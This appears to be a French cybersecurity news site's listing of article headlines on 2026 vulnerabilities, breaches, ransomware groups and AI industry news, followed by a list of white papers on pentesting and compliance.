CVE-2026-45185 : RCE Exim sur builds GnuTLS CVE-2026-44442 ERPNext : authz bypass critique (CVSS 9.9) CVE-2026-0300 : PAN-OS patché contre la prise root non-auth ICO inflige 964k£ à South Staffordshire pour le hack Cl0p Android Intrusion Logging : Google traque les spywares Anti-Ransomware Day 2026 : The Gentlemen pulvérise le marché Gemini Intelligence : Google joue l'Android Show avant WWDC UAT-8302 : Cisco Talos démasque un APT chinois multi-régions OpenAI DeployCo : 4 milliards pour la filiale conseil IA Ivanti EPMM CVE-2026-1281 et 1340 : RCE non-auth exploitée Cushman & Wakefield : 50 Go Salesforce par ShinyHunters Apache CVE-2026-23918 : double-free HTTP/2 et RCE sur httpd Hugging Face piégé : un faux OpenAI Privacy Filter Patch Tuesday : Windows Shell zero-day et Secure Boot Bleeding Llama : 300 000 serveurs Ollama fuient leur mémoire AWS et Google ouvrent la voie au multicloud privé en mai Mistral Medium 3.5 et Vibe : la French Tech passe au cloud Google intercepte le premier zero-day généré par une IA Spring AI : trois CVE HIGH menacent les apps Java IA n8n Ni8mare CVE-2026-21858 : RCE non-auth CVSS 10.0 TanStack compromis : 84 versions npm piégées par Mini WEF 2026 : 94% des RSSI parient sur l'IA défensive SpaceX Terafab : 119 milliards pour la méga-fab IA de Musk cPanel CVE-2026-41940 : Guam et 44 000 serveurs piégés PCPJack : ver cloud qui pille les credentials de ses rivaux iOS 27 : Apple ouvre Apple Intelligence à Claude et Gemini Trellix piraté : RansomHouse pille VMware et Dell EMC Palo Alto PAN-OS CVE-2026-0300 : RCE 9.3 exploitée, patch 13 Instructure piraté : ShinyHunters fuite 275M données Copy Fail CVE-2026-31431 : élévation root Linux exploitée en Cloudflare ampute 1 100 postes au nom de l'IA agentique Five Eyes encadre les agents IA dans les SI critiques Qualcomm bricole l'après-smartphone avec OpenAI et Meta JDownloader piraté : installeurs vérolés au RAT Python AWS US-EAST-1 surchauffe : Coinbase et FanDuel KO 5h CVE-2026-42208 : LiteLLM, le proxy IA piraté par SQLi MuddyWater recrute via Teams sous fausse bannière Chaos CVE-2026-42354 : Sentry SAML SSO, prise de compte via IdP DAEMON Tools : installeurs piégés sur le site officiel Let's Encrypt arrête tout : trois heures sans certificats Dirty Frag : Exploit RCE Linux via xfrm-ESP et RxRPC (56c) Amazon Quick : l'IA de bureau d'AWS débarque sur PC Anthropic dreaming : Claude apprend de ses erreurs GPT-5.5-Cyber : OpenAI Red Teaming Cybersécurité IA Cushman & Wakefield : 50 Go Salesforce par ShinyHunters Patch Tuesday 12 mai : Secure Boot, dernière fenêtre CVE-2026-23918 : Apache HTTP/2 double-free, RCE en cours Canvas piraté : 275 millions d'élèves et profs exposés Microsoft Agent 365 en GA : agents IA gouvernés à 15 $/user 276 arrestations : pig butchering, 701 M$ saisis en Asie Braintrust piraté : rotation forcée des clés API clients Meta licencie 8 000 personnes le 20 mai pour financer l'IA Gemini 3.1 Flash-Lite GA : Google casse les prix de l'IA vm2 : 12 CVE critiques, le bac à sable Node.js explose CVE-2026-31431 : Linux kernel 'Copy Fail' root, deadline 15 SimpleHelp CVE-2024-57726 : deadline CISA aujourd'hui CVE-2026-41940 : cPanel pillé, MSPs et gouvernements visés SAP rachète Prior Labs : 1 Md€ pour une lab IA en Europe MuddyWater se déguise en Chaos ransomware via Teams CVE-2026-0300 : Palo Alto exploité, patch que le 13 mai DAEMON Tools : backdoor signé, attaque depuis le 8 avril CAISI évalue Google, Microsoft et xAI avant publication Anthropic verse 200 milliards $ à Google Cloud sur 5 ans CVE-2026-0073 : Android frappé par un zero-click RCE via ADB Google Cloud Next 26 : Gemini Enterprise et identités Trellix piraté : le cyberdéfenseur perd un bout de son code ShinyHunters frappe Instructure : 275M Canvas exposés Stormshield Management Center : 10 CVE RCE authentifiée CVE-2026-32202 : Windows Shell exploité par APT28, CISA Pentagon : 7 IA sur réseaux classifiés, Anthropic exclue GPT-5.5 sur AWS Bedrock : OpenAI s'invite chez Anthropic VENOMOUS#HELPER : 80 victimes via faux mails SSA et RMM DigiCert piégé par un .scr : 60 certificats EV révoqués CVE-2026-23918 : Apache HTTP/2 RCE, Patch 2.4.67 (51c) Anthropic + Wall Street : 1,5 Md$ pour Claude en entreprise Everest revendique Fiserv : le coeur des paiements US visé CVE-2026-41940 : cPanel exploité contre des États et des MSP CVE-2026-4670 : MOVEit Automation rouvre la plaie de 2023 Shadow-Earth-053 : Pékin frappe un État NATO et la presse Bruxelles allège NIS2 pour 28 700 entreprises européennes Canvas piraté : ShinyHunters revendique 275 M de profils Roblox : 3 arrestations en Ukraine, 610 000 comptes piratés NSA teste Mythos d'Anthropic sur les failles Microsoft Liberty Mutual visé : Everest revendique 100 Go de données Norton Healthcare : 2,5 millions de patients exposés GitHub CVE-2026-3854 : RCE en un git push, 88 % vulnérables CVE-2026-32202 : Microsoft re-patche un zero-click NTLM Amazon remet 25 Mds$ dans Anthropic : Trainium scale up Meta licencie 8 000 le 20 mai, Microsoft pousse des départs BlackCat : 4 ans pour les négociateurs devenus attaquants Microsoft Agent 365 en GA : la console pour gouverner les IA NCSC : préparez-vous à la patch wave dopée par l'IA CVE-2026-31431 Copy Fail : 732 octets pour un root Linux DragonForce + Scattered Spider : la galaxie cartel se Mini Shai-Hulud : SAP CAP infecté, l'IDE devient le vecteur Medtronic confirme la fuite : 9M records pour ShinyHunters Trellix Piraté : Compromission Repository Code Source (57c) ADT confirme : 5,5 M de clients exposés par ShinyHunters AppSheet : 30 000 comptes Facebook volés via Google Iran cible les PLC US : alerte CISA-FBI-NSA pour l'OT Apple Q2 2026 : 111 Mds$ de CA et 100 Mds$ rachetés SonicWall : 3 CVE Gen6/7/8, désactivez l'admin web KB5083769 casse les sauvegardes VSS sous Windows 11 AWS Interconnect : multicloud GA avec Google en premier Pentagone signe 8 IA en classifié, Anthropic écarté BlueHammer : CVE-2026-33825 Defender exploité en zero-day CVE-2026-35616 : FortiClient EMS exploité, hotfix urgent CVE-2026-41940 : 1,5M cPanel exposés à un bypass auth DEEP#DOOR : backdoor Python qui pille SSH, cloud et Wi-Fi CVE-2026-32201 : 1300 SharePoint exposés au 1er mai PyTorch Lightning : 2 versions PyPI volent vos secrets Qilin : 6 victimes en 4 jours via RDP enumeration brute CVE-2026-33827 : RCE wormable IPv6 dans la pile Windows CVE-2026-32202 : APT28 vole vos hashes NTLM en zéro-clic Checkmarx : LAPSUS$ publie 96 Go de code et de credentials Vimeo : ShinyHunters exfiltre via Anodot, ultimatum 30 avril Scattered Spider : Bouquet arrêté à Helsinki à 19 ans OpenAI sur AWS Bedrock : GPT-5.5 et Codex chez Amazon Anthropic retarde Mythos, OpenAI brief le Congrès cyber Telia Norge : 2 ans de géolocalisation exposée, Nkom enquête CVE-2026-25874 : LeRobot de Hugging Face exposé à un RCE non prt-scan : 500 PR malveillantes pilotées par IA sur GitHub CVE-2026-3854 : un seul git push pour prendre GitHub.com Europol démantèle un réseau crypto de 50 M€ basé à Tirana LiteLLM CVE-2026-42208 : pré-auth SQLi exploitée en 36h Copy Fail (CVE-2026-31431) : 732 octets pour root sur Linux Outlook : Copilot devient agentique pour gérer vos emails Carnival : 8,7 M de comptes publiés par ShinyHunters VECT 2.0 : ransomware devenu wiper, fichiers détruits Microsoft Defender RedSun : 2e Zero-Day en 15 Jours [2026] CISA KEV : ScreenConnect CVE-2024-1708 réactivée en KEV cPanel/WHM : faille critique d'authentification, patch Pékin bloque le rachat de Manus par Meta : 2 Md$ annulés Ineffable Intelligence : 1,1 Md$ seed pour un ex-DeepMind BlobPhish : phishing en mémoire vise Microsoft 365 Entra Agent ID Takeover : Vol Service Principal [2026] Vercel piraté via Context.ai : OAuth volé, Google compromis Hackers nord-coréens : Calendly piégé pour voler la crypto CVE-2026-32202 : Windows Shell, exploitation active Totolink A8000RU CVE-2026-7156 : RCE pré-auth, exploit CVE-2026-40976 : Spring Boot expose Actuator sans auth (9.1) Google injecte 40 Md$ dans Anthropic, après les TPU eBay paralysé par DDoS : 313 Team revendique l'attaque DeepSeek V4 Pro : 1,6Tn paramètres, 1M tokens, prix cassés Outlook Panne Mondiale du 27 Avril 2026 : Analyse Cause Itron compromis : Snow malware sur 110M de compteurs IoT Microsoft : 8 500 départs volontaires pour financer l'IA CISA AA26-097A : CyberAv3ngers cible PLC Rockwell ICS APT28 PRISMEX : steganographie et COM hijacking contre CVE-2026-32201 : 1300 SharePoint exposés, KEV 28/4 Cohere absorbe Aleph Alpha : 20 Md$ pour l'IA souveraine Litecoin : zero-day MWEB, reorg de 13 blocs en urgence PhantomRPC : Windows RPC élève au SYSTEM, pas de patch Checkmarx fuité par Lapsus$ : code source et MongoDB Pack2TheRoot CVE-2026-41651 : root Linux pour tous (8.8) ADT confirme une fuite : ShinyHunters menace 10 M de clients FIRESTARTER : APT persistant sur les pare-feu Cisco ASA Azure East US : panne 12 h, VMs et identité touchées CISA KEV : SimpleHelp et MagicINFO exploités (4 ajouts) LMDeploy CVE-2026-33626 : SSRF exploité en 12 heures Autovista : ransomware, 13 M de dossiers exposés (51c) Cisco SD-WAN Manager : Analyse CVE-2026-20133 Exploitée nginx-ui CVE-2026-33032 : auth bypass exploitée (9.8) CrowdStrike LogScale : CVE-2026-40050 expose les fichiers UK Biobank : 500 000 dossiers santé en vente sur Alibaba ChatGPT Workspace Agents : OpenAI vise les entreprises GPT-5.5 : 1M Tokens, Reasoning et Tarifs OpenAI [2026] GopherWhisper : l'APT chinois cache son C2 dans Discord Bitwarden CLI piégé : Shai-Hulud infecte le gestionnaire Vercel confirme une intrusion, comptes clients exposés CanisterWorm : Analyse Ver NPM Auto-Propagé via pgserve RedSun : le zero-day Defender sans patch donne SYSTEM Lotus Wiper : le nouveau wiper frappe le Venezuela Rituals : fuite MyRituals, clients européens exposés DeepSeek V4 Pro et Flash : 1M tokens en open-source Security Copilot intégré à Microsoft 365 E5 en avril 2026 SharePoint : 1 300 serveurs exposés à la CVE-2026-32201 Mirai exploite CVE-2025-29635 sur les D-Link DIR-823X ANTS piratée : 19M Français exposés sur le dark web BRIDGE:BREAK : 22 failles exposent 20 000 convertisseurs CVE-2026-40372 : Microsoft patche ASP.NET Core en urgence FakeWallet Malware : 26 Applications Malveillantes iOS Kyber Ransomware : Kyber1024 Post-Quantique Analysé (55c) Gemini Enterprise Agent Platform : Google frappe fort Meta : 8 000 licenciements le 20 mai pour financer l'IA The Gentlemen : 1 570 victimes exposées via SystemBC Anthropic verrouille 3,5 GW de TPU avec Google et Broadcom n8n CVE-2026-21858 : RCE non-auth CVSS 10 sur 100 000 CISA KEV 20 avril : 8 failles ajoutées, Quest KACE en CVSS nginx-ui CVE-2026-33032 : takeover complet via /mcp_message Axios npm piraté : Sapphire Sleet cible 100 M downloads Cisco ISE et Webex : 4 failles critiques CVSS jusqu'à 9.9 Claude Mythos : Anthropic bride son modèle le plus puissant Everest revendique Frost Bank, Citizens Bank : 380 Go volés Apache ActiveMQ CVE-2026-34197 : 6 400 serveurs exposés Gemini Notebooks : Google ouvre la feature au plan gratuit ShinyHunters : ultimatum 21 avril — Zara, Carnival, 7-Eleven SGLang CVE-2026-5760 : RCE 9.8 via modèle GGUF piégé Spinnaker CVE-2026-32604 : RCE non authentifiée CVSS 9.9 Oracle CPU avril 2026 : 483 patches, record trimestriel ChatGPT, Claude et Gemini HS simultanément le 20 avril Codex (OpenAI) masque un cryptominer pendant l'incident Kelp DAO : 292 M$ volés via LayerZero, Lazarus suspecté Vercel piraté via Context.ai : OAuth Workspace exploité ShinyHunters revendique la compromission de Rockstar Games BlueHammer CVE-2026-33824 : RCE Windows IKE en CVSS 9.8 Marimo CVE-2026-39987 : RCE exploitée 10 h après disclosure SAP CVE-2026-27681 : SQL injection ABAP notée 9.9 sur BPC Adobe Acrobat : CVE-2026-34621 exploitée depuis décembre Security Copilot inclus dans Microsoft 365 E5 le 20 avril KB5082063 : reboot loop des contrôleurs de domaine AD MCPwn (CVE-2026-33032) : nginx-ui détourné en deux requêtes Patch Tuesday avril 2026 : zero-day SharePoint exploité FortiClient EMS : deux failles 9.1 exploitées dès mars 2026 78 557 licenciements tech au Q1 2026, dont 48 % dus à l'IA PANAME : la CNIL outille la conformité IA Act des modèles Pushpaganda : Google Discover détourné par IA pour du Operation PowerOFF : 53 domaines DDoS-for-hire démantelés Anubis revendique 2 To volés à Signature Healthcare Brockton Corée du Nord : Zerion piégé par IA, 100 000 $ volés NIST réduit l'enrichissement des CVE, 263% de hausse Claude Design : Anthropic lance son studio visuel IA n8n : webhooks abusés pour diffuser un agent RMM Datto W3LL : le FBI démantèle un kit phishing vendu 500 $ Microsoft Defender : RedSun et UnDefend restent non patchés Rhysida frappe Cookeville : 337 917 patients touchés 170 procureurs ukrainiens piratés par des hackers russes Ni8mare : faille CVSS 10.0 dans n8n (CVE-2026-21858) OpenAI Codex prend le contrôle du Mac et navigue seul UAC-0247 vise hôpitaux ukrainiens avec CHROMELEVATOR McGraw Hill : 13,5 millions d'emails fuités via Salesforce Claude Opus 4.7 : Anthropic officialise son modèle phare PHANTOMPULSE : Obsidian détourné contre finance et crypto CVE-2026-20184 : faille critique SSO Cisco Webex corrigée ShinyHunters publie 78,6M records Rockstar (GTA Online) CVE-2026-33032 : faille critique nginx-ui exploitee (MCPwn) CVE-2026-32201 : zero-day SharePoint exploite (BlueHammer) CamoLeak : faille critique GitHub Copilot Chat exploitée Claude IA détecte une RCE de 13 ans dans Apache ActiveMQ OpenAI lance GPT-5.4-Cyber, un modèle IA pour la cyber Hyperscalers : 700 milliards de dollars pour l'IA en 2026 APT28 déploie le malware PRISMEX contre l'Ukraine et l'OTAN Fausse app Ledger Live sur l'App Store : 9,5 M$ volés Fortinet : 11 failles dont 2 critiques dans FortiAnalyzer Booking.com piraté : données clients exposées et phishing SiFive lève 400 M$ pour ses puces IA open source RISC-V CrowdStrike : un réseau compromis en 29 minutes en moyenne Google Chrome lance les « Skills IA » pour automatiser vos Adobe : Analyse zero-day Acrobat Reader exploité 5 mois Patch Tuesday avril 2026 : Microsoft corrige 167 failles Basic-Fit piraté : un million de membres européens exposés CVE-2026-39987 : RCE dans Marimo exploitée en 10 heures CVE-2026-35616 : zero-day critique dans FortiClient EMS CVE-2026-20160 : RCE root critique dans Cisco SSM On-Prem JanelaRAT : le malware bancaire qui frappe l'Amérique latine Meta lance Muse Spark et tourne le dos à l'open source Microsoft prépare un agent IA autonome pour Copilot 365 Eclipse lève 1,3 milliard de dollars pour l'IA physique Waymo partage ses données de nids-de-poule avec Waze France : la nouvelle feuille de route cybersécurité LexisNexis piraté : 400 000 profils exposés dont des agents Drift : 285M dollars volés par des hackers nord-coréens Smart Slider 3 : attaque supply chain sur 800 000 sites Microsoft Copilot limité au divertissement selon ses CGU OpenAI propose une taxe robot et la semaine de quatre jours Rockstar Games piraté : ShinyHunters fixe un ultimatum au 14 Commission européenne piratée : 30 entités UE exposées Figure : près d'un million de comptes fintech piratés Operation Atlantic : arnaque crypto de 45 M$ démantelée REvil et GandCrab : la police allemande identifie les chefs Storm-1175 : Medusa ransomware déployé en moins de 24 heures CVE-2026-35616 : zero-day FortiClient EMS exploité Deux experts US plaident coupable pour attaques BlackCat Anthropic atteint 30 milliards et signe un accord massif Microsoft prépare des datacenters blindés face aux frappes Extensions IA : un angle mort critique pour la cybersécurité Axios compromis : Google accuse le groupe nord-coréen VENOM : la plateforme de phishing qui cible les dirigeants Massachusetts : un hôpital paralysé par une cyberattaque Ransomware ChipSoft : chaos dans les hôpitaux néerlandais CPUID piraté : CPU-Z et HWMonitor distribués avec un malware Microsoft intègre Security Copilot directement dans Defender Lapsus$ revendique le vol de données internes d'AstraZeneca EngageLab SDK : 50 millions d'utilisateurs Android exposés Shadow AI : la menace invisible qui échappe aux équipes Marimo : faille RCE exploitée 10 heures après sa publication Smart Slider 3 Pro : attaque supply chain via mise à jour Adobe Reader : un zero-day exploité via PDF malveillants Bitcoin Depot : 3,6 millions de dollars en BTC volés Apache ActiveMQ : une faille RCE dormait depuis 13 ans npm : 36 faux plugins Strapi déploient des reverse shells CISA : patch d'urgence Ivanti EPMM avant le 11 avril Microsoft baisse les tarifs de Windows 365 de 20 % Corée du Nord : 1 700 paquets malveillants npm et PyPI Uber mise sur les puces IA d'Amazon pour son cloud Fortinet : zero-day critique dans FortiClient EMS exploité Affinity : fuite de données après compromission d'un admin Faille UEFI critique : attaques pré-boot sur ASUS, MSI Drift Protocol : 285M volés par des hackers nord-coréens Windows 11 : Microsoft corrige le bug du menu Démarrer OpenAI propose une taxe sur les robots et la semaine de 4 Claude Mythos : Anthropic traque des milliers de zero-days Sondage : les Américains adoptent l'IA mais n'y croient pas Ninja Forms WordPress : faille critique RCE exploitée L'Iran cible les automates industriels US via des attaques Docker CVE-2026-34040 : contournement AuthZ et accès hôte FrostArmada : APT28 détourne des routeurs pour voler vos Storm-1175 : la Chine déploie Medusa via des zero-days Le Japon mise sur les robots IA face à la pénurie de travail Qilin ransomware frappe Die Linke, parti politique allemand L'Iran cible 300 organisations israéliennes via Microsoft LiteLLM piégé : TeamPCP compromet 33 000 secrets via PyPI Google lance Eloquent, une app de dictée IA hors ligne Brightspeed enquête : vol de données d'un million de clients Flowise AI : faille CVSS 10 exploitée sur 12 000 serveurs FBI : hackers chinois piratent le système de surveillance Chrome Zero-Day CVE-2026-5281 : faille WebGPU exploitée Microsoft lance trois modèles IA maison pour concurrencer Aflac : 22,6M victimes après une cyberattaque massive BlueHammer : un chercheur publie un zero-day Windows Microsoft force Windows 11 25H2 sur PC non gérés (52c) Affinity : une fuite de données expose 175 000 utilisateurs Axios npm piraté : Corée du Nord derrière l'attaque React2Shell : 766 serveurs Next.js compromis, credentials Drift Protocol : hack à 285 M$ attribué à la Corée du Nord Cisco IMC : faille critique CVSS 9.8 permet un accès admin NoVoice : un rootkit Android caché dans 50 apps du Play Apple étend iOS 18.7.7 pour contrer l'exploit DarkSword Fortinet : faille critique FortiClient EMS exploitée Slack déploie 30 fonctionnalités IA et devient un agent Commission européenne hackée via Trivy : 30 entités UE BrowserGate : LinkedIn scanne vos extensions de navigateur CVE-2026-0625 : zero-day critique dans les routeurs D-Link GlassWorm : 72 extensions Open VSX piégées développeurs CVE-2026-5281 : zero-day Chrome WebGPU exploité activement Le CMA britannique lance une enquête sur les licences cloud Google NotebookLM passe à Gemini 2.5 Flash : raisonnement OpenAI teste des Skills pour ChatGPT, inspirées de Claude Faille critique Fortinet CVE-2026-32756 : exploitation Akira Ransomware cible les ESXi via une faille vCenter Microsoft Copilot Security Agents pour automatiser le SOC Claude 4 Opus d Anthropic : benchmark et implications NIS 2 Directive : Premières Sanctions ANSSI France 2026 Rebellions lève 400 M$ pour défier Nvidia sur les puces IA Exchange Online : Microsoft peine à résoudre des pannes TridentLocker frappe Sedgwick, sous-traitant du gouvernement Hims & Hers : ShinyHunters vole des millions de tickets Qilin revendique le vol de données du parti allemand Die Interlock exploite un zero-day Cisco FMC CVSS 10 depuis SparkCat : un malware vole les cryptos depuis les stores Microsoft lance ses propres modèles IA pour défier OpenAI Fuite Claude Code : des dépôts GitHub piégés diffusent Vidar PTC Windchill : la police allemande réveille les admins GitHub Copilot entraîne ses IA sur vos données dès le 24 285 M$ volés en 12 minutes par des hackers nord-coréens 766 serveurs Next.js compromis par vol de credentials une faille CVSS 9.8 permet le reset des mots de passe admin Cisco corrige deux failles CVSS 9.8 dans IMC et SSM Le FBI alerte sur les risques des applications mobiles ShareFile : deux failles chaînées permettent une RCE sans NoVoice : malware Android espion vocal sur Google Play un exploit kit iOS cible WebKit et le kernel Apple Microsoft alerte sur une campagne VBS avec bypass UAC TrueChaos : un APT chinois exploite TrueConf pour cibler Microsoft lance Copilot Wave 3 et Agent 365 pour l'ère UAC-0255 usurpe le CERT-UA et diffuse le RAT AGEWHEEZE Chrome : Google corrige un 4e zero-day exploité en 2026 L'Iran relance Pay2Key avec des pseudo-ransomwares TeamPCP compromet des environnements cloud via MCP Le CMA ouvre une enquête sur Microsoft pour ses licences VMware Aria Operations : RCE critique exploitée activement Cisco SD-WAN : un zero-day CVSS 10 exploité depuis trois ans Citrix NetScaler : faille critique CVSS 9.3 exploitée Databricks lance Lakewatch, un SIEM dopé à l'IA générative Microsoft enchaîne les correctifs d'urgence Windows en 2026 Axios piraté : un RAT distribué via npm à 100 millions CareCloud Breach : Dossiers Patients Exposés en 2026 le malware IA qui vole vos identifiants navigateur ChatGPT : une faille permettait l'exfiltration de données LexisNexis piraté : 400 000 profils cloud exposés via ShinyHunters vole 350 Go de données à la Commission Aflac notifie 22 millions de clients après une cyberattaque CTRL : toolkit RAT russe ciblant les entreprises via RDP macOS Tahoe 26.4 : Apple bloque les attaques ClickFix 10 561 failles détectées dans 1,2 million de commits GitHub : de fausses alertes VS Code propagent un malware Microsoft retire KB5079391 : problèmes de démarrage Le DoJ démantèle des botnets IoT derrière le DDoS record FortiGate : campagne active de vol de credentials ciblant CISA alerte sur une RCE exploitée, 24 700 instances exposées CVE-2026-20131 : Interlock exploite un zero-day Cisco FMC NIST renouvelle son guide de sécurité DNS après douze ans Handala pirate la messagerie du directeur du FBI Kash Patel Infinity Stealer : un nouveau malware cible macOS via Windows 11 : Microsoft publie un correctif d'urgence le fossé des compétences se creuse entre experts et novices Ubiquiti UniFi : faille CVSS 10 expose 29 000 équipements CVE-2026-21385 : Qualcomm corrige un zero-day Android CVE-2026-0625 : zero-day exploité sur routeurs D-Link Google corrige deux zero-days Skia et V8 exploités Mistral lance Voxtral TTS, modèle vocal open source à 4B GitHub lance la détection IA pour sécuriser le code source CVE-2026-3055 : Citrix NetScaler sous reconnaissance active Crunchyroll piraté : 6,8 millions de comptes compromis TeamPCP piège le SDK Telnyx sur PyPI via stéganographie WAV CVE-2025-53521 : F5 BIG-IP exploité, CISA exige un patch BlackCat : deux experts cybersécurité plaident coupable CVE-2026-32746 : RCE root non authentifié dans Telnetd APT28 exploite un 0-day MSHTML avant le Patch Tuesday Red Menshen : BPFDoor espionne les télécoms depuis 2021 Anthropic : la justice américaine bloque le ban de Trump Commission européenne : 350 Go volés via un cloud AWS Bearlyfy frappe 70 entreprises russes avec GenieLocker LangChain et LangGraph : trois failles critiques révélées PolyShell : 57 % des boutiques Magento vulnérables attaquées CVE-2026-33017 Langflow : RCE non authentifié exploité Qilin cible Malaysia Airlines : données passagers volées Conduent : brèche SafePay expose 25 millions d'Américains Mistral Small 4 : un seul modèle MoE remplace trois IA PolyShell : skimmer WebRTC vole 56 % des boutiques Magento CanisterWorm : TeamPCP infecte Trivy et 66 packages npm GlassWorm utilise Solana comme C2 pour son RAT furtif Medusa Ransomware : 9 jours hors-ligne pour un hôpital US Mandiant M-Trends 2026 : accès initial cédé en 22 secondes CVE-2026-20131 Cisco FMC : CVSS 10.0, hôpitaux visés CERTFR-2026-ALE-003 : ANSSI alerte sur les messageries Opération Checkmate : BlackSuit ransomware démantélé LiteLLM piraté : attaque supply chain PyPI TeamPCP EvilTokens PhaaS : 340 organisations M365 touchées Slopoly : Hive0163 déploie un malware généré par IA FCC interdit l'import de routeurs étrangers aux USA Silver Fox APT : espionnage et cybercrime ciblant l Asie Firefox 149 intègre un VPN gratuit et le Split View CVE-2026-32746 : RCE root non authentifié, GNU Telnetd CVE-2026-22557 Ubiquiti UniFi CVSS 10.0, 87 000 exposés TELUS Digital : ShinyHunters et le Vol de 1 PO de Data CVE-2025-32975 : Quest KACE SMA CVSS 10.0 exploité NVIDIA Agent Toolkit : IA autonome sécurisée en prod CVE-2026-3055 Citrix NetScaler : fuite de tokens SAML Crunchyroll confirme une fuite touchant 6,8 M d'utilisateurs Tycoon 2FA démantelé : Europol met fin au PhaaS MFA bypass TeamPCP étend son attaque supply chain à Checkmarx KICS CVE-2026-33017 Langflow : RCE exploité 20h après disclosure Stryker : le wiper iranien Handala détruit 80 000 terminaux Zero-Day CVSS 10.0 PTC Windchill : webshells en production Un hacker russe condamné à 81 mois pour ransomware La Corée du Nord piège les devs crypto via VS Code CMA UK : décision imminente contre AWS et Microsoft Moscou Usurpe Signal pour Cibler Officiels et Journalistes Microsoft Corrige en Urgence son Patch Tuesday Cassé GlassWorm Piège 72 Extensions VSCode pour Voler des Secrets PhantomRaven : Campagne npm Cible les Secrets CI/CD VMware Aria Operations CVE-2026-22719 : CISA KEV RCE Cisco FMC CVE-2026-20131 : Interlock RCE Root Actif DarkSword : exploit iOS zero-day ciblant les iPhones Le DoJ démantèle 4 botnets IoT au record de 31 Tbps n8n : 4 Failles RCE Critiques, 24 700 Serveurs Exposés Trivy : Attaque Supply Chain via GitHub Actions 2026 Meta : Agent IA Autonome Déclenche un Incident Critique Mistral Small 4 : Le Modèle Open Source 119B Tout-en-Un CVE-2026-21992 : Oracle Identity Manager RCE CVSS 9.8 Malaysia Airlines : le Groupe Quilin Exfiltre les Données Marquis Financial : 672 000 Victimes et Données Bancaires CVE-2025-68613 n8n : CISA KEV, 24 700 instances RCE exposées Navia Benefit Solutions : 2,7M dossiers santé exposés Opération Alice : 373 000 sites dark web démantelés CVE-2026-32746 : RCE Root dans GNU Telnetd CVSS 9.8 APT28 BadPaw et MeowMeow : Nouvelles Armes Contre l'Ukraine APT41 Silver Dragon : Espionnage via Google Drive C2 CVE-2026-20131 : Cisco FMC Zero-Day CVSS 10 Exploité CVE-2026-20963 SharePoint RCE Exploité : Alerte CISA KEV CVE-2026-33017 Langflow RCE : Exploité en Moins de 20h Iran-Handala : Wiper sur Stryker, FBI Saisit les Domaines CERT-FR : Messageries Instantanées Détournées Sans Malware TELUS Digital : ShinyHunters Vole 1 Pétaoctet de Données GLM-5 : Zhipu AI Lance un Modele 744B Parametres en 2026 Kali Linux 2025.4 : Passage a Wayland par Defaut en 2026 RSAC 2026 : Les Tendances Cybersécurité de l'Annee Patch Tuesday Fevrier 2026 : 4 Zero-Days Critiques Google Finalise l'Acquisition de Wiz pour 32 Milliards Gemini 3.1 Pro : 1 Million de Tokens en Contexte en 2026 Entra ID : Jailbreak de l'Authenticator Decouvert en 2026 FIRST Prevoit 50 000 CVE Publiees en 2026 : Guide Complet Entra ID : Migration Obligatoire vers DigiCert G2 en 2026 Anthropic Lance Cowork : Claude Sans Code pour Tous FCC Alerte : Ransomware Quadruple Depuis 2021 en 2026 Qilin Ransomware Domine le Paysage des Menaces Q1 2026 McDonald's India : Everest Ransomware Frappe Fort en 2026 CNIL France Travail : Sanction de 5 Millions EUR en 2026 CNIL : Free Mobile Sanctionne a 42 Millions EUR en 2026 Patch Tuesday Janvier 2026 : 112 CVE Corrigees en 2026 Microsoft Publie un Guide de Durcissement AD Complet Kali Linux 2025.3 : 15 Nouveaux Outils de Pentest en 2026 Cegedim Sante : 15 Millions de Patients Exposes en 2026 Kubernetes 1.35 : User Namespaces en Production en 2026 CNIL : Amende de 3,5M EUR pour Partage Illegal de Donnees SoundCloud et Inotiv : Double Fuite de Donnees en 2026 Leroy Merlin : Fuite de Donnees de 2 Millions de Clients GPT-5.2 : OpenAI Repousse les Limites a 400K Tokens React2Shell : RCE Critique CVSS 10 dans React Native BadSuccessor : Nouvelle Faille Critique Windows AD NIS 2 : l'Allemagne Adopte sa Loi de Transposition Shai-Hulud 2 : Supply Chain NPM Compromis a Grande Echelle Llama 4 Scout et Maverick : Meta Passe au Multimodal Microsoft Renforce la Protection CSP dans Entra ID Attaques Active Directory en Hausse de 42% en 2025 CVE-2025-20337 : RCE Critique dans Cisco ISE : Guide Complet Claude 4.5 : Anthropic Mise sur les Agents IA en 2026 Gemini 3 : Google Bat Tous les Benchmarks LLM en 2026 GPT-5.1 : OpenAI Lance son Modele le Plus Puissant ISO 27001:2022 : Fin de Transition en Octobre 2025 DoorDash : Fuite Massive via Social Engineering en 2026 OpenAI Renonce a l'Open Source pour ses Modeles IA SimonMed : Medusa Ransomware Expose 500K Patients en 2026 Ingénierie Sociale par IA : Menace Cyber n°1 en 2025 Failles de Sécurité Critiques Découvertes dans l'App Cisco Lance un Outil pour Sécuriser les Déploiements Faille Copilot 365 : Exfiltration de Données Sensibles Microsoft Déploie un Fix d'Urgence pour le Bug en 2026 Crimson Collective Exfiltre 12 To via F5 BIG-IP en 2026 Oracle EBS : Zero-Day RCE Exploite en Production en 2026 CVE-2025-64446 : Faille Critique FortiWeb CVSS 9.8

Livres Blancs

17 articles
Formation OWASP 2026 : Top 10, ASVS, ZAP & Labs PME Certifications Pentest 2026 : OSCP, CRTP, CRT, PNPT Sécuriser Active Directory — Le Guide Complet (447 pages) Proxmox VE 9 — L'ouvrage complet : Guide IA Complet 2026 DFIR : Réponse à Incident et Forensics | Guide Expert Zero Trust : Architecture et Déploiement Entreprise Red Team vs Blue Team : Méthodologies et Outils Expert Sécurité Microsoft 365 : Audit et Durcissement Complet Guide Complet du Pentest Cloud : AWS, Azure et GCP Sécurité DevSecOps : Intégrer la Sécurité dans le CI/CD IA Offensive et Défensive en Cybersécurité | Guide 2025 Conformité ISO 27001 : Guide Pratique d'Implémentation Livre Blanc : Anatomie Attaque Ransomware — Guide Pratique Livre Blanc : Pentest Cloud AWS Azure GCP — Guide Pratique Livre Blanc : Sécurité Kubernetes — Guide Pratique Livre Blanc Directive NIS2 : Guide Conformité Expert Livre Blanc Active Directory : Guide Méthodologique

Consulting

15 articles
